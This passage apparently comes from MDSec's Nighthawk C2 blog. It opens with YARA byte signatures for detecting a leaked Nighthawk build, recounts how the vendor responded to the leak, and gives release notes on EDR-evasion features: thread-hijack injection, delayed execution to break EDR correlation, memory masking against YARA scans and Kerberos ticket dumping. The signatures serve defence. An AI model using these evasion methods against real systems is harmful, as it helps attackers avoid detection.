               $nh_shellcode_sequence_8 = { 68 02 00 00 48 83 C7 7F 33 C0 49 8B CD F3 AA 48 89 B5 90 00 00 00 48 89 B5 A0 00 00 00 48 89 95 }
               $nh_shellcode_sequence_9 = { FF FF 75 05 39 70 74 74 12 48 8D BD F8 65 00 00 48 83 C7 7F 33 C0 8D 48 0D F3 AA 48 89 74 24 68 }
               $nh_shellcode_sequence_10 = { 24 10 48 89 74 24 18 48 89 7C 24 20 55 41 56 41 57 48 8B EC 48 83 EC 70 48 8B FA 48 8B F1 41 BE }
               $nh_shellcode_sequence_11 = { 87 01 00 E1 06 46 18 88 0C 00 D5 05 F4 87 01 00 E1 06 46 18 88 0C 00 15 07 F4 87 01 00 E1 06 46 }
               $nh_shellcode_sequence_12 = { 1C 01 00 48 8B D0 48 8D 8D 80 0C 00 00 E8 84 DA FF FF 90 48 8B D0 48 8D 4C 24 20 E8 9E 13 01 00 }
               $nh_shellcode_sequence_13 = { 60 74 74 0F 48 8D 7D 28 48 83 C7 7F 33 C0 8D 48 0D F3 AA 4C 89 23 BE 0F 00 00 00 48 89 73 18 4C }
               $nh_shellcode_sequence_14 = { 74 05 E8 F6 F4 02 00 48 89 7B 20 48 89 6B 28 66 89 7B 10 48 8B 5C 24 30 48 8B 6C 24 38 48 83 C4 }
               $nh_shellcode_sequence_15 = { 08 00 00 00 07 00 00 00 08 00 00 00 07 00 00 00 08 00 00 00 07 00 00 00 08 00 00 00 00 00 00 00 }
               $nh_shellcode_sequence_17 = { 0C 00 8E 18 88 0C 00 05 03 F0 42 02 00 01 07 46 62 AC 0E 00 2E 18 88 0C 00 96 18 88 0C 00 DD 04 }
               $nh_shellcode_sequence_20 = { 00 00 CC D8 11 00 00 00 00 00 E2 D8 11 00 00 00 00 00 00 00 00 00 00 00 00 00 17 00 00 00 00 00 }
               $nh_shellcode_sequence_21 = { 48 C7 45 FF 0F 00 00 00 C6 45 E7 00 B9 50 00 00 00 E8 80 03 02 00 48 8B D8 41 B8 42 00 00 00 4C }
               $nh_shellcode_sequence_22 = { FD FF FF FF 75 06 83 78 74 00 74 12 48 8D BD 98 0F 00 00 48 83 C7 7F 33 C0 8D 48 0D F3 AA 48 83 }
               $nh_shellcode_sequence_23 = { 57 C0 F3 0F 7F 44 24 20 48 8D 95 10 01 00 00 E8 E7 1F 00 00 90 48 8D 95 30 01 00 00 E8 8A 22 00 }
               $nh_shellcode_sequence_24 = { 50 4C 8B C0 48 8B 95 C8 03 00 00 E8 14 F9 FF FF 90 4C 39 6C 24 78 72 10 48 8B 4C 24 60 48 85 C9 }
               $nh_shellcode_sequence_25 = { 75 D8 4C 8B 45 38 48 8B 45 E8 41 2B F0 44 89 74 24 28 44 8B CE BA 01 00 00 00 48 89 7C 24 20 8B }
               $nh_shellcode_sequence_26 = { F0 08 00 00 48 39 B5 28 09 00 00 72 11 48 8B 8D 10 09 00 00 48 85 C9 74 05 E8 47 A1 FD FF 4C 89 }
               $nh_shellcode_sequence_27 = { 89 BD 60 02 00 00 48 89 9D 68 02 00 00 41 B8 12 00 00 00 48 8D 15 8C 4F 07 00 48 8D 8D 50 02 00 }
               $nh_shellcode_sequence_28 = { D0 48 0F 42 D8 48 8D 53 01 E8 33 2A FE FF 48 8B 4C 24 68 4E 8D 34 75 02 00 00 00 4C 89 7F 10 45 }
               $nh_shellcode_sequence_29 = { CC 40 53 48 83 EC 30 48 8B D9 48 8D 4C 24 20 E8 65 75 00 00 48 83 F8 04 77 1A 8B 54 24 20 B9 FD }
               $nh_shellcode_sequence_30 = { 8B D0 48 8D 4C 24 20 E8 60 14 01 00 48 8B C8 E8 04 55 01 00 0F B6 C0 89 05 37 39 11 00 48 39 B5 }
               $nh_shellcode_sequence_31 = { 48 8D 4D D0 4C 8B C7 41 8B D4 E8 A5 FB FF FF EB A9 45 8B CE 48 8D 4D D0 4C 8B C7 41 8B D4 E8 71 }
               $nh_shellcode_sequence_32 = { 00 49 03 FC 33 C0 8D 48 0D F3 AA 48 89 5D 00 48 89 5D 10 4C 89 7D 18 41 B8 16 00 00 00 48 8D 15 }
               $nh_shellcode_sequence_34 = { 48 03 C9 48 8D 41 10 48 3B C8 48 1B C9 48 23 C8 74 53 48 3B CA 77 35 48 8D 41 0F 48 3B C1 77 0A }
               $nh_shellcode_sequence_35 = { 41 8B DE 45 39 32 76 1F 41 8B 52 04 41 8B 4A FC 8B C3 41 03 DF 48 03 C8 48 03 D0 8A 04 3A 42 88 }
               $nh_shellcode_sequence_36 = { 8B FB 33 C0 F3 AA FF 15 C2 9A 06 00 48 8B C8 4C 8B C3 33 D2 FF 15 9C 9A 06 00 48 89 75 90 48 C7 }
               $nh_shellcode_sequence_37 = { E8 F6 32 03 00 85 C0 75 05 40 B7 01 EB 03 40 32 FF F6 C3 01 74 1B 83 E3 FE 48 83 7C 24 58 10 72 }
               $nh_shellcode_sequence_38 = { E8 61 70 0A 00 C6 04 33 00 EB 13 48 8B D6 48 89 74 24 20 48 8B CF E8 83 02 00 00 48 8B F8 49 83 }
               $nh_shellcode_sequence_40 = { 0F B6 01 4C 8D 15 67 D6 07 00 42 8A 04 10 88 01 48 8D 49 04 49 83 E8 01 75 E6 48 FF C2 49 83 E9 }
               $nh_shellcode_sequence_41 = { 06 0D 00 00 48 8B D8 48 85 C0 0F 84 AE 00 00 00 8B 30 65 48 8B 0C 25 30 00 00 00 48 8B 51 60 48 }
               $nh_shellcode_sequence_42 = { 48 83 EC 20 48 8B FA 48 8B D9 FF 15 1E 17 08 00 33 C9 48 89 7C 24 30 49 B8 25 23 22 84 E4 9C F2 }
               $nh_shellcode_sequence_44 = { 0A 48 8B CD FF 15 6D 7C 06 00 90 48 83 7F 18 08 72 0D 48 8B 0F 48 85 C9 74 05 E8 A4 62 FE FF 4C }
               $nh_shellcode_sequence_46 = { AA FF 15 91 43 06 00 48 8B C8 4C 8B C3 33 D2 FF 15 6B 43 06 00 4C 89 74 24 30 48 C7 44 24 38 0F }
               $nh_shellcode_sequence_47 = { 00 00 00 48 C7 45 CF 0F 00 00 00 E8 87 CA 01 00 48 8D 55 B7 48 8D 4D 17 E8 72 89 00 00 48 8B D0 }
               $nh_shellcode_sequence_48 = { 8B 48 60 48 8B 41 30 F7 40 70 FD FF FF FF 75 06 83 78 74 00 74 12 48 8D BD 98 0F 00 00 48 83 C7 }
               $nh_shellcode_sequence_49 = { 8B 85 F8 00 00 00 48 83 C0 F8 48 C7 85 B8 0A 00 00 40 00 00 00 48 89 85 98 0A 00 00 48 8B 44 24 }
               $nh_shellcode_sequence_50 = { E8 7C FE FF FF F6 C3 01 74 0D BA 48 01 00 00 48 8B CF E8 A6 F3 08 00 48 8B 5C 24 30 48 8B C7 48 }
               $nh_shellcode_sequence_51 = { 48 8B 50 10 4C 39 78 18 72 03 48 8B 00 4C 8B 43 10 48 8B CB 4C 39 7B 18 72 03 48 8B 0B 4C 3B C2 }
               $nh_shellcode_sequence_52 = { 24 48 E8 F7 14 F9 FF 48 8B F8 48 8D 15 D9 4A 07 00 48 8D 8D 40 0A 00 00 E8 A9 1D F9 FF 48 8B D0 }
               $nh_shellcode_sequence_53 = { 48 8B C8 48 8B FE 33 C0 F3 AA FF 15 3C B0 0C 00 48 8B C8 4C 8B C6 33 D2 FF 15 16 B0 0C 00 48 83 }
               $nh_shellcode_sequence_54 = { 4C 8B C6 33 D2 FF 15 B4 EF 08 00 4C 89 7C 24 50 4C 89 6C 24 58 66 44 89 7C 24 40 41 B8 20 00 00 }
               $nh_shellcode_sequence_55 = { 83 E9 01 0F 84 8A 00 00 00 83 E9 01 74 59 83 E9 01 74 27 83 F9 01 0F 85 84 01 00 00 B9 10 01 00 }
               $nh_shellcode_sequence_56 = { 48 89 44 24 20 4C 8D 4D 7F 4C 8D 45 BF 48 8B CB E8 25 F9 FF FF 44 8B E8 48 8B 7D EF 85 C0 0F 84 }
               $nh_shellcode_sequence_57 = { 31 00 2D 00 32 00 2D 00 32 00 00 00 00 00 00 00 00 00 00 00 61 00 70 00 69 00 2D 00 6D 00 73 00 }
               $nh_shellcode_sequence_58 = { 48 8D 43 10 4C 8D 4B 28 48 89 44 24 20 48 8D 8B 68 04 00 00 48 8D 54 24 34 E8 3A 01 00 00 FF C7 }
               $nh_shellcode_sequence_59 = { 00 00 70 54 0F 80 01 00 00 00 80 54 0F 80 01 00 00 00 88 54 0F 80 01 00 00 00 98 54 0F 80 01 00 }
               $nh_shellcode_sequence_62 = { 48 89 7D 48 33 D2 48 8B CE E8 49 FD FF FF 4C 8B 7D 40 41 B8 01 00 00 00 48 8B 55 48 49 8B CF E8 }
               $nh_shellcode_sequence_63 = { B9 89 0E 00 E8 89 0E 00 6C AB 10 00 E8 89 0E 00 17 8A 0E 00 6C AB 10 00 17 8A 0E 00 46 8A 0E 00 }
               $nh_shellcode_sequence_64 = { 8B 0B 48 85 C9 74 05 E8 BC F8 02 00 48 89 7B 10 48 89 6B 18 66 89 3B 48 8B 5C 24 30 48 8B 6C 24 }
        condition:
        12 of ($nh_shellcode_sequence*)
}
 
import "pe"
 
rule leaked_nighthawk_0_2_1_x86 {
    meta:
        author = "MDSec Consulting Ltd"
        id = "eb9c0a18-8f92-4326-b42b-9050c32ef7dc"
        creation_date = "2025-01-09"
        last_modified = "2025-01-09"
        reference_sample = "ed2a3e937467e6420c368a6d9a204eb116e59a2522ada747b42294540afb4972"
        threat_name = "Nighthawk.Leaked.0-2-1"
        severity = 100
        arch_context = "x86"
        scan_context = "file, memory"
        os = "windows"
    strings:
               $nh_shellcode_sequence_1 = { 8D 93 B0 00 00 00 8D 8D 64 FF FF FF E8 D5 9D FF FF 59 83 78 14 08 72 02 8B 00 8D 4D 98 51 6A 00 }
               $nh_shellcode_sequence_4 = { 32 FB 32 1C 33 36 33 3D 33 54 33 58 33 5C 33 60 33 64 33 68 33 6C 33 70 33 74 33 78 33 7C 33 80 }
               $nh_shellcode_sequence_6 = { FF 74 0A 8D 55 F8 8B CB E8 FD F5 FF FF 8B C6 5F 5E 5B C9 C3 55 8B EC 83 EC 0C B9 46 A3 C8 D8 53 }
               $nh_shellcode_sequence_7 = { E8 E9 FB FF FF 81 47 04 94 00 00 00 EB 08 50 8B CF E8 27 04 00 00 83 4D FC FF 8D 8D 20 FF FF FF }
               $nh_shellcode_sequence_8 = { 08 03 D0 8B 45 FC 40 89 45 FC FF 45 FC 0F B6 00 D3 E0 03 D0 83 C7 10 8B 45 E4 8B 4D D4 23 C2 8B }
               $nh_shellcode_sequence_9 = { 43 01 00 8B CF E8 7F 89 00 00 83 C4 18 FF 75 D4 E8 E1 FA FF FF 83 C4 1C E9 2F FF FF FF 89 65 D8 }
               $nh_shellcode_sequence_10 = { 00 68 FF FF 00 00 FF B0 8C 00 00 00 FF 15 D8 A5 09 10 03 75 F4 8D 86 00 00 10 00 50 57 6A 00 FF }
               $nh_shellcode_sequence_11 = { DC F7 FF 8D 4D 9C E9 A8 DD F7 FF 8D 8D E0 FE FF FF E9 8E A7 F7 FF 8D 4D E4 E9 25 DA F7 FF CC CC }
               $nh_shellcode_sequence_12 = { 57 04 00 00 B8 04 0A 10 5A 04 00 00 C8 04 0A 10 65 04 00 00 D8 04 0A 10 6B 04 00 00 E8 04 0A 10 }
               $nh_shellcode_sequence_13 = { 56 0C 8B 0E 85 D2 74 4B 83 7A 04 01 89 4D E0 75 42 FF 76 10 B9 B8 8D 0C 10 E8 02 A5 FB FF 8B 4E }
               $nh_shellcode_sequence_14 = { 19 41 83 E8 01 75 F8 8B 4D F8 51 FF 15 74 A2 09 10 39 5D FC 74 22 FF 75 FC E8 CB A1 03 00 59 8B }
               $nh_shellcode_sequence_15 = { C3 02 00 00 83 EF 04 83 C4 0C 8B C7 83 E0 FC 83 F8 08 7D CA EB 5B 8B 03 89 5C 24 14 89 44 24 18 }
               $nh_shellcode_sequence_16 = { FF E8 AA 3C 07 00 85 C0 75 27 6A FE E8 5F 41 07 00 85 C0 75 1C 68 A0 19 00 10 68 50 6B 0C 10 E8 }
               $nh_shellcode_sequence_18 = { A2 A9 FC FF 83 EC 18 8D 85 54 FF FF FF 8B F4 83 EC 18 8B CC 50 E8 4E A5 FC FF 8B CE E8 9D FE 01 }
               $nh_shellcode_sequence_20 = { 88 00 00 00 4C 27 00 00 8A 00 00 00 33 27 00 00 8C 00 00 00 66 00 00 00 A8 BA 09 10 64 00 00 00 }
               $nh_shellcode_sequence_21 = { 00 89 45 E4 8B 45 EC 03 C6 8B 35 B8 84 0C 10 89 45 D8 8B CE 8D 45 E0 50 6A 40 8D 45 DC 50 8D 45 }
               $nh_shellcode_sequence_22 = { FF FF FF E5 6E 07 10 09 6F 07 10 00 00 00 00 FE FF FF FF 00 00 00 00 D0 FF FF FF 00 00 00 00 FE }
               $nh_shellcode_sequence_23 = { F8 05 0A 10 04 0C 00 00 04 06 0A 10 07 0C 00 00 10 06 0A 10 09 0C 00 00 1C 06 0A 10 0A 0C 00 00 }
               $nh_shellcode_sequence_24 = { FF 15 B4 A3 09 10 8B 75 F0 56 FF 15 B0 A3 09 10 6A 0C 8D 45 B8 53 50 E8 C8 09 05 00 8B 45 E8 83 }
               $nh_shellcode_sequence_25 = { 32 C0 C3 83 79 2C 00 75 E7 3C 6A 0F 8F B1 00 00 00 0F 84 A2 00 00 00 3C 49 74 43 3C 4C 74 33 3C }
               $nh_shellcode_sequence_27 = { 57 FF 75 0C FF 15 9C A3 09 10 8B F0 FF 15 10 A3 09 10 8B 7D 08 3B F0 0F 85 96 00 00 00 8D 45 08 }
               $nh_shellcode_sequence_29 = { 0C 8B CE FF 15 70 A6 09 10 FF D6 5E C3 33 C0 40 5E C3 8B FF 55 8B EC 56 68 24 E9 09 10 68 1C E9 }
               $nh_shellcode_sequence_30 = { D0 89 7D E0 0F 43 45 D0 66 89 88 00 00 01 00 EB 0D 2B 7D E0 8D 4D D0 53 57 E8 D4 9C FE FF 83 7D }
               $nh_shellcode_sequence_31 = { 4C 35 50 35 54 35 58 35 5C 35 60 35 64 35 68 35 6C 35 70 35 74 35 78 35 7C 35 80 35 84 35 88 35 }
               $nh_shellcode_sequence_32 = { 8E A4 00 00 00 8D 0C 4D 04 00 00 00 E8 19 0E 01 00 8B D0 89 96 A0 00 00 00 85 D2 74 36 8B 0D B4 }
               $nh_shellcode_sequence_33 = { 83 C4 10 83 F8 FF 74 21 6A FF 40 8B CF 50 8D 44 24 2C 50 E8 81 FA FE FF 50 8B CF E8 A3 FB FE FF }
               $nh_shellcode_sequence_34 = { 8B 47 04 33 DB 43 8B 08 8A 02 88 45 EE 0F B6 C0 8A 44 08 04 0F B6 C0 83 F8 11 0F 87 73 01 00 00 }
               $nh_shellcode_sequence_35 = { C3 5B 64 89 0D 00 00 00 00 C9 C2 0C 00 55 8B EC 83 EC 2C 53 56 57 8B F9 83 7F 08 01 75 51 8B 1F }
               $nh_shellcode_sequence_37 = { 04 FD FB FF 85 F6 0F 84 FC 01 00 00 8B 75 F0 8B 7D EC 8D 8D D8 FE FF FF E8 8A C7 FF FF 8B 4D B4 }
               $nh_shellcode_sequence_38 = { E8 A2 CC FE FF 85 C0 74 7A 8B B3 90 00 00 00 8B 9B 94 00 00 00 EB 5C 56 8D 4D A0 E8 77 00 00 00 }
               $nh_shellcode_sequence_39 = { F3 75 F1 8B 37 8B 47 08 2B C6 83 E0 E0 50 56 E8 3B 35 FE FF 59 59 5B 8B 45 0C 8B 4D 08 C1 E0 05 }
               $nh_shellcode_sequence_40 = { 87 14 01 00 00 89 45 F4 8B 46 14 89 45 F8 74 0D 3B 41 10 75 08 8B 45 F4 89 41 0C EB 06 8B 45 F8 }
               $nh_shellcode_sequence_42 = { FC 09 8B 5D D0 53 FF 15 30 A4 09 10 8D 43 10 50 FF 15 30 A4 09 10 8D 43 20 50 FF 15 30 A4 09 10 }
               $nh_shellcode_sequence_43 = { 4D E0 6A 08 0F 4F D8 E8 F1 0D 00 00 0B C2 59 59 74 5D 8B 55 E4 4E 89 37 8B 0A 0F B6 06 8A 44 08 }
               $nh_shellcode_sequence_44 = { 4D D0 E8 A5 57 03 00 83 C4 18 39 78 14 72 02 8B 00 50 FF 75 EC E8 BD A9 FF FF 8D 4D D0 89 85 6C }
               $nh_shellcode_sequence_45 = { 55 B4 8B 45 10 89 45 B0 8B 45 14 89 45 D0 8B 45 E0 89 45 AC 83 65 F4 00 83 65 EC 00 83 65 F4 00 }
               $nh_shellcode_sequence_46 = { C0 89 55 C4 72 02 8B 06 8D 4D C0 51 8D 4D C8 51 52 50 FF 15 48 A1 09 10 8D 8F A8 00 00 00 85 C0 }
               $nh_shellcode_sequence_47 = { E8 1F 71 FC FF 33 F6 BA 2A B6 B8 B0 56 6A 04 56 51 56 8B C8 E8 FF 76 FC FF 59 59 50 56 56 FF 75 }
               $nh_shellcode_sequence_48 = { 8B 9D 5C FC FF FF 13 D2 41 3B CB 75 E8 85 D2 74 4C 83 FB 73 73 16 89 94 9D 60 FC FF FF 8B 9D 5C }
               $nh_shellcode_sequence_50 = { CC CC CC CC CC CC CC CC CC CC CC CC 56 8B F1 83 7E 3C 00 74 22 83 7E 40 00 74 0F FF 76 3C FF 15 }
               $nh_shellcode_sequence_52 = { 3E 83 C4 0C 89 75 CC 8D 45 CC 89 5D FC 50 8B 47 54 8B CF 2B 47 4C 50 6A 09 E8 63 E2 FF FF 8B 45 }
               $nh_shellcode_sequence_53 = { 89 0D 84 51 0C 10 89 15 80 51 0C 10 89 1D 7C 51 0C 10 89 35 78 51 0C 10 89 3D 74 51 0C 10 66 8C }
               $nh_shellcode_sequence_55 = { 75 EC 8B 75 EC 8B 46 04 89 45 E4 EB 03 8B 75 EC 3B F8 74 93 8B 45 E0 2B C7 89 45 E0 57 8D 0C 38 }
               $nh_shellcode_sequence_56 = { 4D 09 10 1C 00 00 00 29 4D 09 10 22 05 93 19 04 00 00 00 E4 5E 0B 10 00 00 00 00 00 00 00 00 00 }
               $nh_shellcode_sequence_57 = { 73 0B 10 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF 00 00 00 00 FF FF FF FF 00 }
               $nh_shellcode_sequence_58 = { 56 FF 75 08 8B F1 E8 74 82 FC FF C7 06 08 C1 09 10 8B C6 5E 5D C2 04 00 55 8B EC 83 EC 10 53 8B }
               $nh_shellcode_sequence_59 = { 5F 65 72 72 6F 72 40 73 74 64 40 40 00 B0 C7 09 10 00 00 00 00 2E 3F 41 56 72 75 6E 74 69 6D 65 }
               $nh_shellcode_sequence_61 = { 00 51 50 FF 15 58 A3 09 10 85 C0 0F 84 35 04 00 00 6A 07 59 33 C0 8D BD 28 FF FF FF F3 AB 8D 8D }
               $nh_shellcode_sequence_62 = { 11 6A 10 E8 AE 14 06 00 59 8B 4E 04 89 04 B9 8B 4E 04 FF 75 08 8B 0C B9 E8 C2 00 00 00 FF 46 10 }
               $nh_shellcode_sequence_63 = { 0A B1 10 0F B7 86 BC 16 00 00 FF 46 14 2A C8 83 86 BC 16 00 00 F3 66 D3 EF 0F B7 C7 EB 18 8D 41 }
               $nh_shellcode_sequence_64 = { C2 AC FD FF 8D 46 30 C6 45 FC 01 50 8D 4F 30 E8 B2 AC FD FF 8B 4D F4 8B C7 5F 5E 64 89 0D 00 00 }
        condition:
        12 of ($nh_shellcode_sequence*)
}

We continued to monitor the underground forums for chatter about the software, and particular thanks to Palo Alto’s Unit42 for supporting us in extending our visibility by providing us with threat intelligence data. Everything that we saw indicated that the software was not fully functional and due to the missing components could not be made to work. Over the coming months, we saw the software became more widely shared/traded on Telegram and other platforms including virus total. While it’s impossible to control this, we attempted to thwart the spread by making it less publicly available by alerting the hosting platforms and issuing DMCA takedowns where necessary.

When we first became aware of the leak, we also realised that we needed to do better at protecting the software. While we still believe that strict vetting, issuing the software on a named user basis and watermarking are a strong deterrent and push for a responsible customer, they can’t prevent accidental or intentional disclosure of the software. Once any component is in the hands of a bad actor, the only fallback you have is your technical controls, and in this case what we had was insufficient for protecting it being used.

With the above in mind, we felt we were at a cross roads and had a choice of either continuing on with business as normal, focussing on building new features and evasions or try and give our full attention to mitigating the risks of any future leaks by giving the technical protections a serious re-architecture. In our mind, the weight and risks of potential abuse far outweighed any X Internet points for new evasion and we made the conscious decision that we would not release any further versions of the software under the current licensing format. We didn’t want to spend the next ten years paying lip service to threat actor abuse before making the choice to improve our controls.

Sometime in January we began redesigning our licensing solution, basing our efforts on one key concept; that we should always be able to retain control of the software, even if it leaked. This ultimately meant that we needed to change how the software worked, as historically we had designed it to be able to offer a fully offline solution as this is a key requirement for certain types of customers. However, the downside to that model is you lose a degree of control.

As of Nighthawk 0.3.4, online connectivity is required to start both the API server and the UI, including on restart in the case of the API server. Both will operate offline once they have been launched, but should they be closed, online connectivity will again be required for the API. This online requirement empowers us as the software vendor as it means we now have the ability to prevent the software functioning if we need to revoke it. In its on-disk format, all components of the software are unusable in the software bundle until it is online activated; meaning that if the software leaked in future it would simply be unusable.

To limit any potential spread of the software even with a legitimate license, we also introduced hardware locking. The hardware locking is intertwined with the online activation, with users only able to concurrently activate up to the number of purchased licenses. To make this as manageable for customers as possible, we added the ability to deactivate the license seat to the UI. We felt that this was a reasonable compromise for users who may be using per engagement operator VMs for example. The software bundles continues to remain only available behind an MFA protected portal.

To protect our new controls from reverse engineering and cracking, we also wrapped them in a number of commercial and homegrown protections and obfuscators.

We’re not saying what we’ve developed is perfect or even uncrackable, we’re hackers as well after all and recognise the limitations of any type of licensing solution, but we feel it’s a significant step in the right direction for protecting the product from abuse. However, at the same time we’re not intending on writing a blog post on how to crack it ourselves, even in satire.

We still regularly check-in with various EDR vendors to see if they have seen any in the wild abuse of the software. To date, we have not been made aware of a single instance and we suspect this is predominantly due to the leaked copy being incomplete. However, we also recognise this was more luck than it being impossible. If any blue teams are looking for support in trying to determine the legitimacy of a Nighthawk artifact, we’ve setup the abuse@nighthawkc2.io mailbox and we’d encourage anyone with any suspicions to get in touch.

What’s New

In April, we made two new additions to the Nighthawk team; GigelV41464 and saab_sec, bringing the team to five full time developers. The team has been exceptionally busy, building new features, tools and performing R&D and there’s a number of exciting new developments in the works that we expect to be pushed over the next few releases.

In the 0.3.4 release, in addition to a number of bug fixes and minor OpSec improvements like stretching the beacon call stack masking to our execute-bof and execute-exe harnesses, we added a number of new features.

Asynchronous BOF Support

In September last year at the Redtreat conference, the Outflank team presented a talk on Asynchronous BOFs and with us and several other c2 vendors, discussed the possibility of introducing this concept as a new standard. The idea being that a number of new beacon API calls would be introduced to support asynchronous execution and implemented such that the same BOF would work regardless of what framework you were using.

The concept behind asynchronous BOFs is that the BOF should be able to execute and run independently, irrespective of the beacon’s state in its sleep cycle. We’re not going to dive in to this topic in any greater detail as our friends at Outflank already published a post on it and we recommend you check this out first if you haven’t already.

As mentioned, the Async BOF API includes a number of new methods to support this design; the full specification will be released by Outflank in due course.

Within this release, we included a number of examples of Async BOFs:

• alert_logon_async: this BOF will continue to execute while the beacon remains in it’s encrypted sleep state, waking the beacon when a specific user logs on.
• alert_process_async: this BOF will continue to execute while the beacon remains in it’s encrypted sleep state, waking the beacon when a specific process is created.

In addition to this, we also ported our beacon’s call stack masking feature to our BOF harness and execute-exe harnesses such that the thread for both BOF and exe executions occur with a fully spoofed call stack.

Check out this example that monitors for notepad.exe being created while the core beacon continues to remain in its encrypted sleep cycle:

Revamped Injectors

Remote process injection can be a common detection point in post-exploitation tradecraft. The reason for this is that conceptually there are only a finite number of ways to achieve it and for the most part they all involve the common steps of opening handles, allocating memory and using some form of trigger to execute it in a new or hijacked thread. This allows EDRs to closely monitor for this kind of behaviour and alert on anything following these steps. In our previous release, we added a new and unpublished injection vector to our injector chains which avoided some of the common IoCs associated with remote process injection. In this release, we improved this by adding a number of permutations that improved the reliability of the technique, specifically the ExperimentalHijackNoUIThread, ExperimentalHijackCreateThread and ExperimentalHijackCreateThreadIndirect configuration options for ExecuteMemory. We don’t intend to elaborate at this time on how this thread hijacking technique works to prolong its effectiveness.

Further to this, we added a new injector chain configuration option delay-executememory. When set, this configuration option will add a timer to the final step of shellcode execution, irrespective of the injector chain being used. Through our own testing, we found that in many cases adding a sufficiently large delay of 5 to 10 minutes or more to a process injection technique would sufficiently disrupt the EDR timeline that it would not accurately correlate the process injection steps correctly, meaning that even basic injector chains using known primitives such as SetThreadContext or CreateThread would still be effective.

Good things come to those who wait ;)

Improvements to C2 Protocols

Nighthawk’s C2 protocol was originally built across a number of steps that would asynchronously complete each task using a specific sequence of request and responses. This protocol had the benefits of compact requests, reliability and error checking with a tradeoff against the volume of requests.

In our latest release, we introduced a new C2 protocol named sync. When using sync, the beacon and C2 server will batch tasks across a single set of request and responses, significantly reducing the number of C2 requests and therefore dramatically improving speed, against the tradeoff of larger request/response sequences.

This protocol is ideal when high performance is required, including scenarios such as SOCKs, hidden-desktop or screenwatch.

Native Kerberos Support

One of the things that’s been on our agenda for some time was improving the beacon’s support for kerberos tickets. This release made our first steps in that direction, introducing a number of additional built-in commands to handle various kerberos related tradecraft. Specifically, the following commands that will run natively inside beacon are now available:

• klist: list out the kerberos tickets available in memory,
• dump: dump the current kerberos tickets from memory,
• ptt: inject a ticket to a specific logon ID,
• luid: list the current logon ID

We have a number of follow on posts planned to outline these and other features in Nighthawk, so stay tuned - happy hacking!

Introduction

Nighthawk 0.3.3; Evanesco, unveils our latest research. “Evanesco” is a Latin term that means “I disappear” or “I vanish.” Potterheads may also recognise it as the spell used to make objects disappear. This is exactly what the Nighthawk 0.3.3 release does; disappears from memory under a cloak of invisibility.

This is also the first release since we welcomed @s4ntiago_p to the @MDSecLabs team; his positive contributions to Nighthawk are already coming to fruition in this release and we’re excited about what he brings to the team going forwards.

As a minor release, we’ve focussed on delivering a small number of innovative new features, while also making a significant number of quality of life and bug fixes. Let’s look at some of the improvements.

Memory Masking

In-memory tradecraft is now essential for operating in modern, mature Windows environments. Memory scanning, whether periodic or event-driven, poses an unavoidable challenge when facing Endpoint Detection & Response solutions and teams of threat hunters.

One of the biggest challenges for in-memory tradecraft is avoiding signatures. The most common approach is implementing sleep encryption, a technique that keeps the beacon fully encrypted during its sleep cycle. A public example is @C5pider’s EKKO, an implementation influenced by Nighthawk, which encrypts and decrypts copies of the reflective DLL while avoiding executable memory through NTContinue gadgets and the CreateTimerQueueTimer API.

While this approach reduces the exposure of the beacon while no active tasking is occurring, there are of course significant periods while the beacon will be in plaintext in memory, including during initial execution to bootstrap the beacon, during any post-exploitation tasks that may block sleep obfuscation or while in interactive mode such was if performing SOCKs or reverse port forwarding where responsive c2 communications is required. Outside from this, a number of EDR solutions will use event driven memory scanning, where a memory scan is automatically initiated following some form of suspicious actions, which may occur from post-exploitation tooling. This can also tie in to captures of allocation routines, which inevitably leads to the exposure of plaintext memory.

Some of these signatures can be side stepped using simple modifications to either the beacon source code or the reflective DLL, it does require intelligence on the signature. This is less of a problem where the vendor has open sourced their rules, but can be more problematic when up against other less open solutions. In most commercial C2 products, such modifications would also typically need to be done by the vendor and can therefore create a lead time before the signature can be bypassed.

Nighthawk 0.3.3 introduces a groundbreaking memory hiding feature that masks all inactive pages of the beacon, even during interactive execution. This means only a tiny fraction—approximately 2%—of the codebase is ever exposed in plaintext memory at any given moment. We’ve also extended this feature to our execute-exe harness, ensuring that PEs executed inline remain fully encrypted during execution.

The memory hiding feature offers several configurable modes, allowing pages to be optionally encrypted and/or distributed across memory using driploading, for enhanced security.

The following example demonstrates how a Yara rule detects a static signature within a Nighthawk artifact, both on disk and in memory, for a beacon in interactive mode. However, when Nighthawk’s memory hiding feature is enabled, these indicators become invisible—even with a sleep interval of 0:

As mentioned above, this doesn’t just apply to the beacon itself but the memory hiding is extended to the execute-exe inline PE harness, and in the following video you can see we’re able to run mimikatz.exe in the thread of our beacon process on a sleep 0 and still evade any Yara signatures:

Of course, a small stub of code used for decryption and memory hiding must remain exposed. You might think this simply shifts the problem elsewhere. However, we anticipated this and built a code mutator that randomly obfuscates and mutates the decrypt stubs on every artifact generation. This approach significantly reduces the risks posed by signatures.

Python API

In our 0.3 release, we announced the introduction of a new JSON RPC web service API to automate the beacon. With that release, we provided a .NET API, with a selection of c# helper implementations. In this release we’ve mirrored the c# API in an installable Python library.

The Python API allows Nighthawk users to build tooling around the API to interact and automate the beacon. Alongside this, we’ve provided a number of helpful example scripts to illustrate various basic tasks such as notify on new beacons, execute BOFs, monitor for processes on a host and much more.

In the example below, we see two scripts; the first which lists all the agents currently connected, and the second which simply just runs the pwd command on all agents:

Python Module Support

One feature that we were lacking inside Nighthawk was support for client side scripting, similar to how other frameworks such as Cobalt Strike leverage CNA (Sleep 🤮). In this release, we introduced client side scripting support in Python, using PythonNet.

Using the Nighthawk Python API, its now possible to execute and process output from BOFs, Exes and .NET assemblies, facilitating much greater automation within the client.

The Nighthawk Python API introduces the following new methods in the nighthawk Python class:

• register_command: adds a new command to the Nighthawk client (including help and autocomplete support),
• execute_exe: instructs the agent to run an exe using the beacons execute-exe command,
• execute_bof : instructs the agent to run a BOF using the beacons execute-bof harness,
• inproc_execute_assembly: instructs the agent to run a .NET assembly using the beacons inproc-execute-assembly command,
• get_agents : retrieve a list of all beacon agents (dead or alive),
• get_agent_info: gets basic information about an agent,
• console_write : prints text to the console.

In addition to this, the API also includes a Packer class which can be used to pack BOF arguments.

External tooling can then be trivially integrated in to Nighthawk, and if required parsed and processed in Python code. For example, to add a new calcs command to Nighthawk, using the Situational Awareness BOF suite, you might create a python script similar to the following:

# python function that will be called when the 'cacls' command is entered
def cacls_function(params, info):
	# make sure the parameters are ok
    if len(params) > 1:
        nighthawk.console_write(CONSOLE_ERROR, "No enough params")
        return False
    elif len(params) > 1:
        nighthawk.console_write(CONSOLE_ERROR, "Too many params")
        return False

